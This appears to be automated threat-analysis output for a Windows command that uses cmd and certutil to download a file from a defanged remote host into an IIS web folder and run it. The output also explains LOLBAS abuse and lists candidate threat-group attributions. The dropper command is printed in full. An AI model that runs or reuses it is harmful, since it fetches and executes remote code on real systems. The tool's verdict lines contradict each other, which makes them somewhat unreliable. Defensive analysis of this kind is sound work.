Malicious — high-confidence attack behavior
Attack signal: Dropper.
cmd.exe /c cd /d "C:\inetpub\wwwroot\aspnet_client\" & certutil.exe -urlcache -split -f hxxp://p.estonine[.]com/p & p
Uses the Windows Command Prompt to execute an inline Windows command, then uses the Windows certificate utility to download a file (via the URL cache) from `p.estonine.com`.
The command leverages Cmd.exe and Certutil.exe, a Windows set of binaries catalogued in LOLBAS as commonly abused for living-off-the-land attacks — known abuse categories: Encode, Decode, and Download.
1 network indicator were extracted (0 IPs, 1 URL) and returned no hits across queried threat intelligence sources.
The combination of high-confidence threat behavior, known-abused binary usage, and payload obfuscation strongly suggests this is an active attack payload. Treat this command as malicious and initiate containment procedures.
All indicators appear clean across queried sources.
unexpected EOF while looking for matching '"' (position 117)
This tool uses a Linux bash parser (bashlex). Windows commands, PowerShell, and embedded scripts are expected to fail shell parsing — analysis above is not affected.
Russian SVR threat group responsible for the SolarWinds supply chain attack and numerous government breaches. Known for stealthy, long-dwell intrusions.
Vietnamese state-sponsored group targeting foreign corporations, governments, and journalists with access to political, economic, and corporate secrets.
Sophisticated financially motivated group targeting the hospitality, restaurant, and retail industries. Known for spear-phishing with malicious documents and point-of-sale malware.
Russian GRU Unit 26165 threat group active since at least 2004. Primarily targets governments, militaries, and security organizations.
Attribution based on MITRE ATT&CK technique overlap. Confidence reflects TTP match depth — not a definitive attribution.